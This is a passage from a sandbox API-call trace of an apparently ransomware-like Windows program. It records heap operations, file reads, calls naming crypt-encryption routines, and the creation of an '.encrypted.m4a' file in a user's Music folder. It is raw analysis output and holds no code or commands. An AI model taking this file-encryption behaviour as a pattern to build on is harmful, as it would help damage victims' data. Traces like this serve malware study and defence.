Flags=0x0, Size=0x90) returned 0x7c3818 [0038.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0038.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0038.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0038.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0038.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0038.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0038.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0038.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0038.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0038.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0038.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0038.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0038.374] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music")) returned 0x11 [0038.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0038.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0038.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0038.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0038.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0038.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0038.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0038.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0038.374] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.encrypted.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\s65zb6ggvh2opwafb.encrypted.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0038.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0038.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0038.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0038.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0038.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0038.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0038.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0038.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0038.375] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0038.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0038.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0038.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0038.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0038.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0038.375] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0038.375] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0038.375] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0038.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0038.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0038.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0038.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0038.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0038.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0038.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0038.376] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0038.376] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x28f2, lpOverlapped=0x0) returned 1 [0038.377] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0038.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0038.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0038.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x28f2) returned 0xac0018 [0038.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0038.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0038.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0038.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0038.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0038.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0038.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x28f2) returned 0xac2918 [0038.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0038.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.378] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0038.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0038.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x28f2) returned 0xac0018 [0038.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0038.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0038.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0038.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.379] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0038.379] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0038.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0038.379] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0038.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0038.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0038.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0038.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0038.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0038.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x28f2) returned 0xac0018 [0038.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0038.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0038.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0038.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0038.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da408 [0038.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0038.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0038.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0038.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da288 [0038.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0038.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0038.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0038.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca18 [0038.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0038.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0038.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0038.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0038.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0038.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x28f2) returned 0xac5218 [0038.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0038.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0038.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0038.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0038.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0038.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0038.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0038.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0038.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0038.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0038.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0038.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0038.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0038.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0038.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0038.380] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0038.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0038.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0038.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0038.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0038.381] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0038.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0038.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0038.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0038.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0038.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0038.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0038.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0038.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0038.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0038.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0038.381] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0038.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0038.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0038.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0038.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da398 [0038.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0038.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0038.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0038.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0038.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889a90 [0038.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0038.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0038.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0038.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0038.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0038.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0038.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0038.382] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0038.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0038.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0038.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0038.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0038.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0038.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0038.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0038.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0038.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0038.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0038.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0038.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0038.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0038.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0038.382] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0038.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0038.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0038.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0038.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0038.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0038.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0038.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0038.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0038.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0038.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0038.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0038.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0038.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0038.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0038.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0038.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0038.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0038.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0038.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0038.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0038.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0038.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0038.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.383] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0038.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0038.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0038.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0038.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0038.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0038.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0038.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0038.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0038.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0038.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0038.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 